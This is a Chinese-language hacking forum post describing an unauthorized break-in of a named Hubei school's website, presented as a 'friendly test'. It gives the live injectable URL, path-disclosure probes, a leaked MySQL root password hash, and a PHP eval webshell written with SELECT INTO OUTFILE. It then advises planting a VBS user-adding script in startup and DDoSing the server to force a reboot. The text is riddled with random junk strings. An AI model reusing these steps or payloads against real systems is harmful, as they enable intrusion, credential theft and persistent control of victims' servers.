友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
' y/ Z: G9 p7 Q+ {3 H3 f4 V发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
+ @* s0 J2 R8 r% v+ D2 e' a  H0 \


+ l& O& k2 W! R- W) Y常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
5 E& R- W# q4 B' G& f7 ^" t
那么想可以直接写入shell ，getshell有几个条件：
3 G, l0 ?. t( W2 `  Q

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

8 t) H: D  L8 r试着爆绝对路径：
& s8 K6 B# o3 y9 R( G, b1./phpMyAdmin/index.php?lang[]=1  
$ ]' J; i. U6 M9 j  v2./phpMyAdmin/phpinfo.php  
) h: N, U! {8 k8 ~3 H* B6 ]8 C4 H! p+ @3./load_file()  
% }0 ]1 D7 M9 ~8 f1 J2 P  i& c4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
! I2 D# B5 x( P3 I* c6 n. b8 q# I/ h5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  
; i, D3 l0 f( e7 K2 r) w' C5 j
均不行...........................
* H: S3 _- s# p- ^2 H6 a
8 [7 |, S  N/ g# x2 T- M" o. a' Y御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
1 @; v& c' m& N
+ B9 a& [) K+ l1 V6 [权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败
6 p: p) \3 a" f7 S4 _
敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
6 H) X: p0 _3 j8 Q0 _) L3 B
想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
4 t4 ?3 {7 i" j$ h7 \; G* y8 K2 x
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
( e1 u3 R" T' ~* q5 a
9 V, T3 i" W7 b* h自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

成功读到root密码：

. z5 I0 w3 X/ ~& ]# B17---- r(0072)
18---- o(006f)
- x, {) z) I" |7 p* r# B19---- o(006f)
20---- t(0074)
4 h1 `9 c; L8 F; |21---- *(002a)
22---- 8(0038)
23---- 2(0032)
9 T) }1 X( n# Y6 a7 |24---- E(0045)
25---- 1(0031)
& H( _4 v6 |* [- Q$ n9 ~26---- C(0043)
% p9 F) j2 @. r5 Y" [4 h27---- 5(0035)
9 C( q' C  Z2 t7 W9 k28---- 8(0038)
29---- 2(0032)
30---- 8(0038)
31---- A(0041)
32---- 9(0039)
" [" H' K: h: k- o/ K33---- B(0042)
34---- 5(0035)
35---- 4(0034)
36---- 8(0038)
& ^, n  g: _, r( B8 w1 I37---- 6(0036)
38---- 4(0034)
- V& i9 a, Q/ ?# n+ m39---- 9(0039)
40---- 1(0031)
41---- 1(0031)
42---- 5(0035)
43---- 3(0033)
7 Q, m, I) g' \4 y8 A/ L44---- 5(0035)
9 l8 K  d( P+ `* a* p5 {4 \1 c45---- 9(0039)
46---- 8(0038)
5 g3 [. b* L  j7 I% m0 u47---- F(0046)
48---- F(0046)
" u! M, V4 g% n, D( `) b( q9 u# P49---- 4(0034)
" E: ^: V; c3 \( Z' R9 X0 F50---- F(0046)
51---- 0(0030)
52---- 3(0033)
53---- 2(0032)
54---- A(0041)
55---- 4(0034)
56---- A(0041)
57---- B(0042)
6 R! J) x! B6 A# F/ I+ Z58---- *(0044)
59---- *(0035)
60---- *(0041)
6 f. o7 V. f/ a+ }61---- *0032)
0 F. V" Q% H, z0 u* a; _8 X
( {; U9 V3 W8 V) g解密后成功登陆phpmyamin
/ T" J$ A$ B$ ]- S2 D                          
/ a5 G4 E1 t7 ?; F! v1 y
2 Q) W; q$ c# v. s: z5 i. H                             

1 u* ~1 H8 s& B5 z( f' E0 v9 o找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

; L4 e. P8 L! b/ `4 r/ T成功执行，拿下shell，菜刀连接：

服务器不支持asp,aspx,php提权无果...................
: @0 _0 W; L# W9 C
但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

" d& A8 X! w. }8 `5 m0 N

别名     administrators
1 k5 j) _; V, d- k' t注释     管理员对计算机/域有不受限制的完全访问权

1 H: G# G6 Z) o$ h* Q% P$ Z) g4 q+ _

成员

-------------------------------------------------------------------------------
admin
! x# f; ~! F& v3 Z% J5 G% qAdministrator
0 {1 F& ?0 Q- R: C+ O$ aslipper$
sqluser
6 h$ c( D) e6 b命令成功完成。

服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
7 m) v; ]& r5 @" l1 @
2 X# t& }; j; W. ~( jddos服务器重启，不然就只能坐等服务器重启了...............................
: z+ w( a) }& w5 |0 v1 N" P
      

# o2 s/ o( L. q. b# M

angel